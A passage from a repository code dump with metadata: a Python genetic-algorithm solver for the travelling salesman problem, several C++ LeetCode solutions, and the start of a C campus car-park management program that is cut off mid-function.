np\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\n# 个体类\r\nclass Indv:\r\n # 传入个体的基因\r\n def __init__(self, gene):\r\n self.gene = gene\r\n self.score = -1\r\n\r\n\r\nclass GA:\r\n def __init__(self, Pc, Pm, indvNums, scoreFunc, geneLength):\r\n '''\r\n :param Pc: 交叉概率\r\n :param Pm: 变异概率\r\n :param indvNums: 个体数量\r\n :param scoreFunc: 适应度函数\r\n :param geneLength: 基因长度\r\n '''\r\n self.Pc = Pc\r\n self.Pm = Pm\r\n self.indvNums = indvNums\r\n self.scoreFunc = scoreFunc\r\n self.geneLength = geneLength\r\n\r\n self.Groups = []\r\n self.t = 0\r\n self.Optimal = None\r\n self.crossNums = 0\r\n self.mutationNums = 0\r\n self.scoreSum = 0.0\r\n\r\n self.initialize()\r\n\r\n def initialize(self):\r\n self.Groups = []\r\n for i in range(self.indvNums):\r\n # 1. gene = [0,1,2...genelength]\r\n gene = [i for i in range(self.geneLength)]\r\n # 2. 打乱 gene\r\n np.random.shuffle(gene)\r\n # 3. 新个体\r\n indv = Indv(gene)\r\n self.Groups.append(indv)\r\n\r\n # 计算适应度\r\n def fitness(self):\r\n # 1. 初始化\r\n self.scoreSum = 0.0\r\n self.Optimal = self.Groups[0]\r\n for indv in self.Groups:\r\n # 2. 计算个体适应度\r\n indv.score = self.scoreFunc(indv)\r\n self.scoreSum += indv.score\r\n # 3. 更新最优个体\r\n if self.Optimal.score > indv.score:\r\n self.Optimal = indv\r\n\r\n # 交叉\r\n def cross(self, dad, mom):\r\n son, position = [], 0\r\n # 1. 确定交叉片段位置\r\n index1 = np.random.randint(0, self.geneLength - 1)\r\n index2 = np.random.randint(0, self.geneLength - 1)\r\n segment = mom.gene[index1: index2]\r\n for x in dad.gene:\r\n # 2. 到达交叉起点\r\n if position == index1:\r\n son.extend(segment)\r\n position += 1\r\n # 3. 其它情况,直接将基因插入子代 gene\r\n if x not in son:\r\n son.append(x)\r\n position += 1\r\n self.crossNums += 1\r\n return son\r\n\r\n # 变异\r\n def mutation(self, gene):\r\n son = gene[:]\r\n # 1. 确定变异点\r\n index1 = np.random.randint(0, self.geneLength - 1)\r\n index2 = np.random.randint(0, self.geneLength - 1)\r\n # 2. 交换两点基因\r\n son[index1], son[index2] = son[index2], son[index1]\r\n self.mutationNums += 1\r\n return son\r\n\r\n # 选择\r\n def select(self):\r\n # 1. 利用总适应度选择\r\n s = np.random.uniform(0, self.scoreSum)\r\n for indv in self.Groups:\r\n s -= indv.score\r\n if s <= 0:\r\n return indv\r\n raise Exception(\"Error\", self.scoreSum)\r\n\r\n # 产生新子代\r\n def generate(self):\r\n dad = self.select()\r\n # 1. 交叉\r\n P = np.random.random()\r\n if P < self.Pc:\r\n mom = self.select()\r\n gene = self.cross(dad, mom)\r\n else:\r\n gene = dad.gene\r\n # 2. 变异\r\n P = np.random.random()\r\n if P < self.Pm:\r\n gene = self.mutation(gene)\r\n return Indv(gene)\r\n\r\n # 产生新种群\r\n def evolve(self):\r\n # 1. 计算适应度\r\n self.fitness()\r\n # 2. 新一代\r\n groups = [self.Optimal]\r\n # 3. 产生新子代\r\n while len(groups) < self.indvNums:\r\n groups.append(self.generate())\r\n # 4. 更新种群\r\n self.Groups = groups\r\n self.t += 1\r\n\r\n\r\nclass TSP:\r\n def __init__(self, indvNums):\r\n self.indvNums = indvNums\r\n self.initialize()\r\n self.ga = GA(Pc=0.7, Pm=0.1, indvNums=self.indvNums, geneLength=len(self.sites), scoreFunc=self.scoreFunc())\r\n\r\n # 初始化\r\n def initialize(self):\r\n self.sites = []\r\n # 随机生成点\r\n for i in range(100):\r\n x = np.random.randint(0, 200)\r\n y = np.random.randint(0, 200)\r\n self.sites.append((x, y))\r\n\r\n # 计算某基因(路径)的总距离\r\n # 适应度函数\r\n def distance(self, gene):\r\n dist = 0.0\r\n for i in range(-1, len(self.sites) - 1):\r\n index1, index2 = gene[i], gene[i + 1]\r\n site1, site2 = self.sites[index1], self.sites[index2]\r\n # 欧式距离\r\n dist += np.sqrt(pow(site1[0] - site2[0], 2) + pow(site1[1] - site2[1], 2))\r\n return dist / 1000\r\n\r\n def scoreFunc(self):\r\n return lambda indv: self.distance(indv.gene)\r\n\r\n # 运行函数\r\n def run(self, T=0):\r\n res, n = [], 0\r\n # 1. 判断终止条件\r\n while n < T:\r\n # 2. 生成新种群\r\n self.ga.evolve()\r\n # 3. 计算当前迭代最优结果\r\n dist = self.distance(self.ga.Optimal.gene)\r\n print(f'{self.ga.t} : {round(dist, 5)}')\r\n res.append(dist)\r\n n += 1\r\n self.display(res, T)\r\n\r\n # 结果可视化\r\n def display(self, res, T):\r\n plt.plot(range(T), res, color='lightcoral')\r\n plt.title(\"iteration - score\", color='r')\r\n plt.xlabel(\"iteration\")\r\n plt.ylabel(\"score ×10^3\")\r\n plt.show()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n tsp = TSP(100)\r\n tsp.run(500)\r\n" }, { "alpha_fraction": 0.3672390878200531, "alphanum_fraction": 0.4095112383365631, "avg_line_length": 26.11111068725586, "blob_id": "525150fd7544595c014023d1e274e9a323da41af", "content_id": "7888d61cbd8e4e16be7498bcecbfde41a97fea02", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 771, "license_type": "no_license", "max_line_length": 68, "num_lines": 27, "path": "/leetcode/leetcode16_10.cpp", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\r\nusing namespace std;\r\n\r\n// LeetCode 面试题 16.10. 生存人数\r\n\r\nclass Solution {\r\npublic:\r\n int maxAliveYear(vector<int>& birth, vector<int>& death) {\r\n int live[101] = {0};\r\n int MAX_year = 0, MAX_nums = 0;\r\n\r\n for (int i = 0; i < birth.size(); i++)\r\n {\r\n int start = birth[i], end = death[i];\r\n for(int j = start-1900;j <= end-1900;j++){\r\n live[j] += 1;\r\n if(live[j] > MAX_nums){\r\n MAX_year = j + 1900;\r\n MAX_nums = live[j];\r\n } else if(live[j] == MAX_nums && j+1900 < MAX_year){\r\n MAX_year = j + 1900;\r\n }\r\n }\r\n }\r\n return MAX_year;\r\n }\r\n};" }, { "alpha_fraction": 0.44312795996665955, "alphanum_fraction": 0.4620853066444397, "avg_line_length": 21.55555534362793, "blob_id": "4b925bb4eba036cfe42971b537d3457ab6f1947e", "content_id": "57854e7f66640a28f0d73457bdae14f22cc96966", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 436, "license_type": "no_license", "max_line_length": 79, "num_lines": 18, "path": "/leetcode/leetcode1800.cpp", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\r\nusing namespace std;\r\n\r\n// LeetCode 1800. 最大升序子数组\r\n\r\nclass Solution {\r\npublic:\r\n int maxAscendingSum(vector<int>& nums) {\r\n int p = 0, res = 0;\r\n while (p < nums.size()){\r\n int temp = nums[p];\r\n while (p < nums.size()-1 && nums[p+1] > nums[p]) temp += nums[++p];\r\n res = max(res, temp);\r\n p++;\r\n }\r\n return res;\r\n }\r\n};" }, { "alpha_fraction": 0.2758132815361023, "alphanum_fraction": 0.2927864193916321, "avg_line_length": 24.259260177612305, "blob_id": "2226d821d5317ffacd92a73d1335c34f560e98ed", "content_id": "045570a219a5c583dff8f2d7b9b35678212e2077", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 719, "license_type": "no_license", "max_line_length": 62, "num_lines": 27, "path": "/leetcode/leetcode1576.cpp", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\r\nusing namespace std;\r\n\r\n// LeetCode 1576.替换所有问号\r\n\r\nclass Solution {\r\npublic:\r\n string modifyString(string s) {\r\n char a = 'a';\r\n for(int i = 0; i < s.length(); i++){\r\n if(s[i] == '?'){\r\n int k = 0;\r\n if(i == 0){\r\n while (a+k == s[i+1]) k++;\r\n s[i] = a + k;\r\n } else if(i == s.length()-1){\r\n while (a+k == s[i-1]) k++;\r\n s[i] = a + k;\r\n } else {\r\n while(a+k == s[i-1] || a+k == s[i+1]) k++;\r\n s[i] = a + k;\r\n }\r\n }\r\n }\r\n return s;\r\n }\r\n};" }, { "alpha_fraction": 0.4261796176433563, "alphanum_fraction": 0.4292237460613251, "avg_line_length": 23.269229888916016, "blob_id": "ba9aecbb6ffb7de84f78578ddc7ef41acb316ce7", "content_id": "40b9b516856045a5ee266e88f2c5a794941ef49b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 677, "license_type": "no_license", "max_line_length": 57, "num_lines": 26, "path": "/leetcode/leetcode1.cpp", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\r\nusing namespace std;\r\n\r\n// LeetCode 1.两数之和\r\n\r\nclass Solution {\r\npublic:\r\n vector<int> twoSum(vector<int>& nums, int target) {\r\n map<int, int> mp; // first是值,second是索引\r\n vector<int> res;\r\n int pair;\r\n for (int i = 0; i < nums.size(); i++)\r\n {\r\n pair = target - nums[i];\r\n map<int, int>::iterator iter = mp.find(pair);\r\n if(iter != mp.end()){\r\n res.push_back(iter->second);\r\n res.push_back(i);\r\n break;\r\n } else {\r\n mp[nums[i]] = i;\r\n }\r\n }\r\n return res;\r\n }\r\n};\r\n" }, { "alpha_fraction": 0.38494935631752014, "alphanum_fraction": 0.40086829662323, "avg_line_length": 22.75, "blob_id": "e74cdd13d96c1e7e23cd27d6bb32f873bd5a6431", "content_id": "2510fa7ba3bf0cc386baf27be7eeeab50a995462", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 699, "license_type": "no_license", "max_line_length": 57, "num_lines": 28, "path": "/leetcode/leetcode1447.cpp", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\r\nusing namespace std;\r\n\r\n// LeetCode 1447.最简分数\r\n\r\nclass Solution {\r\npublic:\r\n vector<string> simplifiedFractions(int n) {\r\n vector<string> vec;\r\n if(n == 1) return vec;\r\n string temp;\r\n for(int i = 2;i <= n;i++){\r\n for(int j = 1;j < i;j++){\r\n if(j == 1 || check(j, i)){\r\n temp = to_string(j)+'/'+to_string(i);\r\n vec.push_back(temp);\r\n }\r\n }\r\n }\r\n return vec;\r\n }\r\n bool check(int a, int b){\r\n for(int i = 2;i <= a;i++){\r\n if(a % i == 0 && b % i == 0) return false;\r\n }\r\n return true;\r\n }\r\n};" }, { "alpha_fraction": 0.3242603540420532, "alphanum_fraction": 0.35384616255760193, "avg_line_length": 19.174999237060547, "blob_id": "f6600897445003d5af3cc8a217a28f4c836e4a0d", "content_id": "5890affa91840d03705feaf94d231d806aba1d04", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 859, "license_type": "no_license", "max_line_length": 56, "num_lines": 40, "path": "/leetcode/leetcode13.cpp", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\r\nusing namespace std;\r\n\r\n// LeetCode 13.罗马数字转整数\r\n\r\nclass Solution {\r\npublic:\r\n int romanToInt(string s) {\r\n int res = 0;\r\n for(int i = s.size()-1; i >= 0; i--){\r\n if(i != 0 && values(s[i]) > values(s[i-1])){\r\n res += (values(s[i]) - values(s[i-1]));\r\n i--;\r\n } else {\r\n res += values(s[i]);\r\n }\r\n }\r\n return res;\r\n }\r\n\r\n int values(char c) {\r\n switch (c){\r\n case 'I':\r\n return 1;\r\n case 'V':\r\n return 5;\r\n case 'X':\r\n return 10;\r\n case 'L':\r\n return 50;\r\n case 'C':\r\n return 100;\r\n case 'D':\r\n return 500;\r\n case 'M':\r\n return 1000;\r\n }\r\n return 0;\r\n }\r\n};" }, { "alpha_fraction": 0.4258679747581482, "alphanum_fraction": 0.46061599254608154, "avg_line_length": 19.92751693725586, "blob_id": "3a05376e14e3dd81ec5d177a11cf7c64172d4fbc", "content_id": "a5ce1f5e263e22532a2c38c7f1dbce2a442c4e7b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 39281, "license_type": "no_license", "max_line_length": 161, "num_lines": 1559, "path": "/C/双学位C语言/Cpp1.cpp", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "#include<stdio.h>\r\n#include<cstring>\r\n#include<stdlib.h>\r\n#include<ctype.h>\r\n#include<math.h>\r\n#include <algorithm>\r\n#define MAX 1000\r\n//**************************************** paramster\r\nstruct USER // 定义用户结构体\r\n{\r\n\tchar id[7]; // 用户编号\r\n\tchar card[5]; // 卡类型\r\n\tlong valid; //有效期/次数\r\n\tchar carid1[7]; //车牌号1\r\n\tchar carid2[7]; //车牌号2\r\n\tchar car1in[13]; //车1入场时间\r\n\tchar car2in[13]; //车2入场时间\r\n}user[MAX];\r\n\r\n//定义月份数组,用于计算天数\r\nint month[13][2]={{0,0},{31,31},{28,29},{31,31},{30,30},{31,31},{30,30},{31,31},{31,31},{30,30},{31,31},{30,30},{31,31}};\r\n//**************************************** function\r\nvoid showmenu();\r\nvoid save(int);\r\nvoid creat();\r\nvoid display();\r\nvoid add();\r\nvoid modify();\r\nvoid carin();\r\nvoid carout();\r\nvoid sort();\r\n//**************************************** main function\r\nint main()\r\n{\r\n\tint select,flag,e;\r\n\tshowmenu();\r\n\tprintf(\"请输入您要进行的操作:\");\r\n\tscanf(\"%d\",&select);\r\n\tprintf(\"\\n\"); \r\n\tdo\t\t\t\t\t\t\t\t\t\t//指令选择\r\n\t{\r\n\t\tif(select>=1&&select<=8)\r\n\t\t{\r\n\t\t\tflag=1;\r\n\t\t\tbreak;\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\tflag=0;\r\n\t\t\tprintf(\"input error.choose again.\\n\");\r\n\t\t}\r\n\t}while(!flag);\r\n\twhile(flag) //指令执行\r\n\t{ \r\n\t\tswitch(select)\r\n\t\t{\r\n\t\tcase 1:\r\n\t\t\tprintf(\"创建记录会导致原有记录全部清空,确定继续操作吗(1/0)?\");\r\n\t\t\tscanf(\"%d\",&e);\r\n\t\t\tif(e==1){\r\n\t\t\t\tcreat();\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\telse\r\n\t\t\t\tbreak;\r\n\t\tcase 2:\r\n\t\t\tadd();\r\n\t\t\tbreak;\r\n\t\t\tcase 3:\r\n\t\t\tdisplay();\r\n\t\t\tbreak;\r\n\t\tcase 4:\r\n\t\t\tcarin();\r\n\t\t\tbreak;\r\n\t\tcase 5:\r\n\t\t\tcarout();\r\n\t\t\tbreak;\r\n\t\tcase 6:\r\n\t\t\tmodify();\r\n\t\t\tbreak;\r\n\t\tcase 7:\r\n\t\t\tsort();\r\n\t\t\tbreak;\r\n\t\tcase 8:\r\n\t\t\texit(0); //exit(0):程序正常运行并退出 \r\n\t\t\tbreak;\r\n\t\tdefault:break;\r\n\t\t};\r\n\t\tprintf(\"\\n\");\r\n\t\tprintf(\"是否继续操作?(1/0):\");\r\n\t\tscanf(\"%d\",&e);\r\n\t\tif(e==1)\r\n\t\t{\r\n\t\t\tflag=1;\r\n\t\t\tsystem(\"cls\");\r\n\t\t\tshowmenu();\r\n\t\t\tprintf(\"请输入您要进行的操作: \");\r\n\t\t\tscanf(\"%d\",&select);\r\n\t\t\tprintf(\"\\n\");\r\n\t\t}\r\n\t\telse\r\n\t\t\tflag=0;\r\n\t};\r\n\tprintf(\"*****感谢您的使用。*****\\n\");\r\n\tprintf(\"\\n\");\r\n\treturn 0;\r\n};\r\n//**************************************** functions \r\n\r\nvoid showmenu() //指令菜单\r\n{\r\n\tprintf( \"====== 校园车辆管理系统 ======\\n\" );\r\n\tprintf(\"======\\t1、创建记录\\t======\\n\");\r\n\tprintf(\"======\\t2、添加记录\\t======\\n\");\r\n\tprintf(\"======\\t3、浏览记录\\t======\\n\");\r\n\tprintf (\"======\\t4、车辆进入\\t======\\n\");\r\n\tprintf (\"======\\t5、车辆离开\\t======\\n\");\r\n\tprintf(\"======\\t6、修改记录\\t======\\n\");\r\n\tprintf (\"======\\t7、排序显示\\t======\\n\");\r\n\tprintf (\"======\\t8、离开系统\\t======\\n\");\r\n\tprintf (\"==============================\\n\") ;\r\n\tprintf(\"如要退出系统,请保存信息!\\n\");\r\n};\r\n\r\nvoid save(int m){ //保存信息\r\n\tint i;\r\n\tFILE* fp;\r\n\tif((fp=fopen(\"car.txt\",\"wb\"))==NULL)\r\n\t{\r\n\t\tprintf(\"cannot open file\\n\");\r\n\t\texit(0);\r\n\t}\r\n\tfor(i=0;i<m;i++)\t\r\n\t\tif(fwrite(&user[i],sizeof(struct USER),1,fp)!=1)\r\n\t\t\tprintf(\"file write error\\n\");\r\n\tfclose(fp);\t\r\n}\r\n\r\nint load(){ //载入信息\r\n\tFILE* fp;\r\n\tint i=0;\r\n\tif((fp=fopen(\"car.txt\",\"rb\"))==NULL)\r\n\t{\r\n\t\tprintf(\"cannot open file\\n\");\r\n\t\texit(0);\r\n\t}\r\n\telse\r\n\t{\r\n\t\tdo\r\n\t\t{\r\n\t\t\tfread(&user[i],sizeof(struct USER),1,fp);\r\n\t\t\ti++;\r\n\t\t}\r\n\t\twhile(feof(fp)==0);\r\n\t}\r\n\tfclose(fp);\r\n\treturn(i-1);\r\n};\r\n\r\nbool isFull(){ // 判断是否已满\r\n int m = load();\r\n if (m == MAX) {return true;}\r\n return false;\r\n}\r\n\r\nvoid display(){ //展示信息\r\n\tint i;\r\n\tint m=load();\r\n\tfor(i=0;i<m;i++)\r\n\t\tprintf(\"\\t%s\\t,\\t%s\\t,\\t%d\\t,\\t%s\\t,\\t%s\\t,\\t%s\\t,\\t%s\\t\\n\",user[i].id,user[i].card,user[i].valid,user[i].carid1,user[i].carid2,user[i].car1in,user[i].car2in);\r\n};\t\t\t\r\n\r\nvoid creat() //创建新信息数据\r\n{\r\n\tint i,j,m,flag,k;\r\n\tchar uid[7],cid1[7],cid2[7],today[7],va[7],tcard[5];\r\n\tlong time,v;\r\n\tdo\t\t\t\t\t\t\t\t\t\t//判断输入是否符合要求:位数,数字\r\n\t{\r\n\t\tflag=1;\r\n\t\tprintf(\"请输入今日日期(例190212): \");\r\n\t\tscanf(\"%s\",&today);\r\n\t\tif(strlen(today)!=6)\r\n\t\t\tflag=0;\r\n\t\tfor(k=0;today[k]!='\\0' && flag;k++)\r\n\t\t\tif(isdigit(today[k])==0) // 判断日期格式是否为数字:isdigit\r\n\t\t\t\tflag=0;\r\n\t}while(!flag);\r\n\ttime=atol(today); //将时间转化为数字形式:atol\r\n\r\n\tdo \r\n\t{\r\n printf(\"输入创建用户数(1000以内):\");\r\n scanf(\"%d\", &m);\r\n }while(m>1000);\r\n\r\n\tfor(i=0;i<m;i++)\r\n\t{\r\n\t\tdo //录入用户id\r\n\t\t{\r\n\t\t\tflag=1;\r\n\t\t\tdo //判断用户id是否合理\r\n\t\t\t{\r\n\t\t\t\tflag=1;\r\n\t\t\t\tprintf(\"请输入由字母与数字组成的6位用户ID:\");\r\n\t\t\t\tscanf(\"%s\",&uid);\r\n\t\t\t\tif(strlen(uid)!=6)\r\n\t\t\t\t\tflag=0;\r\n\t\t\t\tfor(k=0;uid[k]!='\\0' && flag;k++)\r\n\t\t\t\t\tif(isalnum(uid[k])==0) //判断用户id是否为字母与数字:isalnum\r\n\t\t\t\t\t\tflag=0;\r\n\t\t\t}while(!flag);\r\n\t\t\tfor(j=0;j<i && flag;j++) //用户id查重\r\n\t\t\t{\r\n\t\t\t\tif((strcmp(user[j].id,uid))==0)\r\n\t\t\t\t{\r\n\t\t\t\t\tprintf(\"该用户已存在,请重新输入:\");\r\n\t\t\t\t\tflag=0;\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}while(!flag);\r\n\r\n\t\tdo //录入第一辆车\r\n\t\t{\r\n\t\t\tflag=1;\r\n\t\t\tdo //判断车牌是否合理:不为0;字母与数字组合\r\n\t\t\t{\r\n\t\t\t\tflag=1;\r\n\t\t\t\tprintf(\"请输入由字母与数字组成的车牌号:\");\r\n\t\t\t\tscanf(\"%s\",&cid1);\t\r\n\t\t\t\tif((strcmp(cid1,\"0\"))==0)\r\n\t\t\t\t{\r\n\t\t\t\t\tprintf(\"用户至少有一辆车!\");\r\n\t\t\t\t\tflag=0;\r\n\t\t\t\t};\r\n\t\t\t\tfor(k=0;cid1[k]!='\\0' && flag;k++)\r\n\t\t\t\t{\r\n\t\t\t\t\tif(isalnum(cid1[k])==0)\r\n\t\t\t\t\t\tflag=0;\r\n\t\t\t\t}\r\n\t\t\t}while(!flag);\r\n\t\t\tfor(j=0;j<i && flag;j++) //车牌查重\r\n\t\t\t{\r\n\t\t\t\tif((strcmp(user[j].carid1,cid1))==0 || (strcmp(user[j].carid2,cid1))==0)\r\n\t\t\t\t{\r\n\t\t\t\t\tprintf(\"该车已存在!\");\r\n\t\t\t flag=0;\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}while(!flag);\r\n\r\n\t\tdo //录入第二辆车,操作同一\r\n\t\t{\r\n\t\t\tflag=1;\r\n\t\t\tdo \r\n\t\t\t{\r\n\t\t\t\tflag=1;\r\n\t\t\t\tprintf(\"若有第二辆车,请输入由字母与数字组成的车牌号,若没有请输入0:\");\r\n\t\t\t\tscanf(\"%s\",&cid2);\r\n\t\t\t\tfor(k=0;cid2[k]!='\\0' && flag;k++)\r\n\t\t\t\t\tif(isalnum(cid2[k])==0)\r\n\t\t\t\t\t\tflag=0;\r\n\r\n\t\t\t\tif(strcmp(cid1,cid2)==0)\r\n\t\t\t\t{\r\n\t\t\t\t\tprintf(\"该车牌号已经输入过了!请重新输入: \");\r\n\t\t\t\t\tflag=0;\r\n\t\t\t\t};\r\n\t\t\t}while(!flag);\r\n\r\n\t\t\tif(strcmp(cid2,\"0\")!=0)\r\n\t\t\t\tfor(j=0;j<i;j++)\r\n\t\t\t\t\tif((strcmp(user[j].carid2,cid2))==0 || (strcmp(user[j].carid1,cid2))==0)\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tprintf(\"该车已存在!\");\r\n\t\t\t\t\t\tflag=0;\r\n\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t}\r\n\t\t}while(!flag);\r\n\r\n\t\tif(flag) //录入有效期并写入文件\r\n\t\t{\r\n\t\t\tstrcpy(user[i].id,uid);\r\n\t\t\tstrcpy(user[i].carid1,cid1);\r\n\t\t\tstrcpy(user[i].carid2,cid2);\r\n\r\n\t\t\tdo //有效期录入\r\n\t\t\t{\r\n\t\t\t\tprintf(\"卡类型(year/time):\");\r\n\t\t\t\tscanf(\"%s\",tcard);\r\n\r\n\t\t\t\tif((strcmp(tcard,\"year\"))==0)\r\n\t\t\t\t{\r\n\t\t\t\t\tdo \r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tflag=1;\r\n\t\t\t\t\t\tprintf(\"请输入有效使用期:\");\r\n\t\t\t\t\t\tscanf(\"%s\",&va);\r\n\t\t\t\t\t\tif(strlen(va)!=6)\r\n\t\t\t\t\t\t\tflag=0;\r\n\t\t\t\t\t\tfor(k=0;va[k]!='\\0' && flag;k++)\r\n\t\t\t\t\t\t\tif(isdigit(va[k])==0)\r\n\t\t\t\t\t\t\t\tflag=0;\r\n\t\t\t\t\t\tif(flag)\r\n\t\t\t\t\t\t\tv=atol(va);\r\n\t\t\t\t\t\tif(v<=time) //有效期与今日时间对比\r\n\t\t\t\t\t\t\tflag=0;\r\n\t\t\t\t\t}while(!flag);\r\n\t\t\t\t\tuser[i].valid=v;\r\n\t\t\t\t\tstrcpy(user[i].card,\"year\");\r\n\t\t\t\t\tbreak;\r\n\t\t\t\t}\r\n\t\t\t\telse if((strcmp(tcard,\"time\"))==0)\r\n\t\t\t\t{\r\n\t\t\t\t\tdo\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tflag=1;\r\n\t\t\t\t\t\tprintf(\"请输入有效次数(一次性输入最大使用次数为30):\");\r\n\t\t\t\t\t\tscanf(\"%s\",&va);\r\n\t\t\t\t\t\tfor(k=0;va[k]!='\\0' && flag;k++) //先判断输入是否为数字\r\n\t\t\t\t\t\t\tif(isdigit(va[k])==0)\r\n\t\t\t\t\t\t\t\tflag=0;\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\t\tif(flag)\r\n\t\t\t\t\t\t\t\tv=atoi(va);\r\n\t\t\t\t\t\t\t\tif(v>30 || v<=0)\r\n\t\t\t\t\t\t\t\t\tflag=0;\r\n\t\t\t\t\t}while(!flag);\r\n\t\t\t\t\tuser[i].valid=v;\r\n\t\t\t\t\tstrcpy(user[i].card,\"time\");\r\n\t\t\t\t\tbreak;\r\n\t\t\t\t}\r\n\t\t\t}while(flag);\r\n\r\n\t\t\tstrcpy(user[i].car1in,\"车辆未进入\");\r\n\t\t\tstrcpy(user[i].car2in,\"车辆未进入\");\r\n\t\t\tif((strcmp(user[i].carid2,\"0\"))==0)\r\n\t\t\t\tstrcpy(user[i].car2in,\"无车辆\");\r\n\t\t\tprintf(\"\\n\");\r\n\t\t};\r\n\t};\r\n\tprintf(\"OK!\");\r\n\tsave(m);\r\n};\r\n\r\nvoid add() //添加信息\r\n{ //add函数的所有添加,验证,容错功能都与creat相同\r\n\tFILE* fp;\r\n\tint n,i,j,flag,k,count=0;\r\n\tint m=load();\r\n\tchar uid[7],ucid1[7],ucid2[7],t[7],va[7],tcard[5];\r\n\tlong time,v;\r\n\r\n\tif (isFull()){printf(\"用户已满,不能添加!\");return;} // 判断是否达到容量上限\r\n\r\n\tdo //日期输入\r\n\t{\r\n\t\tflag=1;\r\n\t\tprintf(\"请输入今日日期(例190212): \");\r\n\t\tscanf(\"%s\",&t);\r\n\t\tif(strlen(t)!=6)\r\n\t\t\tflag=0;\r\n\t\tfor(k=0;t[k]!='\\0' && flag;k++)\r\n\t\t\tif(isdigit(t[k])==0)\r\n\t\t\t\tflag=0;\r\n\t}while(!flag);\r\n\ttime=atol(t);\r\n\r\n\tfp=fopen(\"car.txt\",\"a\");\r\n\tdo{\r\n\t\tprintf(\"现在已有%d个用户,最多还可添加%d个用户,要添加几个?\",m,1000-m);\r\n\t\tscanf(\"%d\",&n);\r\n\t}while(n+m>1000);\r\n\tfor(i=m;i<(m+n);i++)\r\n\t{\r\n\t\tdo\t\t\t\t\t\t\t\t\t\t\t//录入用户id并检查是否合理\r\n\t\t{\r\n\t\t\tdo\r\n\t\t\t{\r\n\t\t\t\tflag=1;\r\n\t\t\t\tprintf(\"请输入由字母与数字组成的用户ID:\");\r\n\t\t\t\tscanf(\"%s\",&uid);\r\n\t\t\t\tif(strlen(uid)!=6)\r\n\t\t\t\t\tflag=0;\r\n\t\t\t\tfor(k=0;uid[k]!='\\0' && flag;k++)\r\n\t\t\t\t\tif(isalnum(uid[k])==0)\r\n\t\t\t\t\t\tflag=0;\r\n\t\t\t}while(!flag);\r\n\t\t for(j=0;j<i && flag;j++)\r\n\t\t\t{\r\n\t\t\t\tif((strcmp(user[j].id,uid))==0)\r\n\t\t\t\t{\r\n\t\t\t\t\tprintf(\"该用户已存在!\");\r\n\t\t\t flag=0;\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}while(!flag);\r\n\r\n\t\tdo\t\t\t\t\t\t\t\t\t// 录入第一辆车\r\n\t\t{\r\n\t\t\tflag=1;\r\n\t\t\tdo\r\n\t\t\t{\r\n\t\t\t\tflag=1;\r\n\t\t\t\tprintf(\"输入由字母与数字组成的车牌号:\");\r\n\t\t\t\tscanf(\"%s\",&ucid1);\t\r\n\t\t\t\tif(strcmp(ucid1,\"0\")==0)\r\n\t\t\t\t{\r\n\t\t\t\t\tflag=0;\r\n\t\t\t\t\tprintf(\"用户至少有一辆车!\");\r\n\t\t\t\t}\r\n\t\t\t\tfor(k=0;ucid1[k]!='\\0' && flag;k++)\r\n\t\t\t\t\tif(isalnum(ucid1[k])==0)\r\n\t\t\t\t\t\tflag=0;\r\n\t\t\t}while(!flag);\r\n\r\n\t\t\tfor(j=0;j<i && flag;j++)\r\n\t\t\t{\r\n\t\t\t\tif((strcmp(user[j].carid1,ucid1))==0 || (strcmp(user[j].carid2,ucid1))==0)\r\n\t\t\t\t{\r\n\t\t\t\t\tprintf(\"该车已存在!\");\r\n\t\t\t flag=0;\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}while(!flag);\r\n\r\n\t\tdo //录入第二辆车\r\n\t\t{\r\n\t\t\tflag=1;\r\n\t\t\tdo\r\n\t\t\t{\r\n\t\t\t\tflag=1;\r\n\t\t\t\tprintf(\"若有第二辆车,请输入由字母与数字组成的车牌号,若没有请输入0:\");\r\n\t\t\t\tscanf(\"%s\",&ucid2);\t\r\n\t\t\t\tfor(k=0;ucid2[k]!='\\0' && flag;k++)\r\n\t\t\t\t\tif(isalnum(ucid2[k])==0)\r\n\t\t\t\t\t\tflag=0;\r\n\t\t\t\r\n\t\t\t\tif(strcmp(ucid1,ucid2)==0)\r\n\t\t\t\t{\r\n\t\t\t\t\tprintf(\"该车牌号刚才输入过了! \");\r\n\t\t\t\t\tflag=0;\r\n\t\t\t\t};\r\n\t\t\t}while(!flag);\r\n\r\n\t\t\tif((strcmp(ucid2,\"0\"))!=0)\r\n\t\t\t\tfor(j=0;j<i;j++)\r\n\t\t\t\t{\r\n\t\t\t\t\tif((strcmp(user[j].carid2,ucid2))==0 || 